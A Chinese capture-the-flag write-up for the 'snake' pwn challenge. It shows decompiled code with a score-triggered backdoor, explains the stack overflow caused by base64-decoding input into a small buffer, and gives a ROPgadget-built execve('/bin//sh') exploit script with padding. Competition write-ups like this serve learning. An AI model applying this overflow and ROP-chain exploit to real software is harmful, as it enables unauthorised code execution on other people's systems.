第八届工业信息安全技能大赛全国复赛snake_wp

pwn题 snake writeup

多少有点不自信，太久没做题，看到题都有点怕怕的

这个程序是一个贪食蛇游戏，主程序如下：

__int64 __fastcall main_4015A5(__int64 a1, __int64 a2)
{int v2; // edxint v3; // ecxint v4; // er8int v5; // er9int v7; // [rsp+Ch] [rbp-4h]sub_400B6D();do{
LABEL_2:sub_40158D();sub_400CA6();print_score_400E09(a1, a2, v2, v3, v4, v5);v7 = getchar();}while ( v7 == -1 );switch ( v7 ){case 'A':case 'a':if ( dword_6BEE04 != 1 )dword_6BEE04 = 3;goto LABEL_16;case 'D':case 'd':if ( dword_6BEE04 != 3 )dword_6BEE04 = 1;goto LABEL_16;case 'S':case 's':if ( dword_6BEE04 )dword_6BEE04 = 2;goto LABEL_16;case 'W':case 'w':if ( dword_6BEE04 != 2 )dword_6BEE04 = 0;goto LABEL_16;case 'q':if ( score_dword_6BD3F0 == 2 )binsh_401427();  //后门return 0LL;default:
LABEL_16:sub_400E29();if ( !(unsigned int)sub_400EDF() ){if ( qword_6BE4A0[0] == qword_6BE480 ){++score_dword_6BD3F0;++dword_6BEE00;sub_4014A7();}a1 = 100000LL;usleep(0x186A0u);goto LABEL_2;}IO_puts("Game Over!");return 0LL;}
}

根据这段代码可以知道，当得分为2时，输入q退出就会进入后门。
后门程序如下：

__int64 binsh_401427()
{int v1; // [rsp+Ch] [rbp-474h] BYREFchar buf[1024]; // [rsp+10h] [rbp-470h] BYREFchar v3[104]; // [rsp+410h] [rbp-70h] BYREF__int64 v4; // [rsp+478h] [rbp-8h]IO_puts("?www!dev#etc$/bin/sh");IO_fflush(off_6BB868);getchar();_libc_read(0, buf, 0x400uLL);v4 = b64decode_40117D((__int64)buf, &v1);return j___libc_memmove_ifunc_0((__int64)v3, v4, v1);// v4拷贝v1个字符到v3
}

这里先打印"?www!dev#etc$/bin/sh"，然后读取最多400个字符到buf，然后经过base64解码（这里可以通过输入一些base64字符串可以看出），然后拷贝到v3，这里是存在栈溢出的。

然后ROPgadget一把梭

ROPgadget --binary pwn --ropchain

选取payload

#!/usr/bin/env python3
# execve generated by ROPgadgetfrom struct import pack# Padding goes here
p = b''p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e0) # @ .data
p += pack('<Q', 0x00000000004005af) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x0000000000480bb1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x00000000004458a0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000480bb1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004006a6) # pop rdi ; ret
p += pack('<Q', 0x00000000006bb0e0) # @ .data
p += pack('<Q', 0x00000000004113f3) # pop rsi ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x000000000044cb86) # pop rdx ; ret
p += pack('<Q', 0x00000000006bb0e8) # @ .data + 8
p += pack('<Q', 0x00000000004458a0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000475e30) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401dac) # syscallfrom base64 import b64encode
payload = b'a'*120 + p
print(b64encode(payload))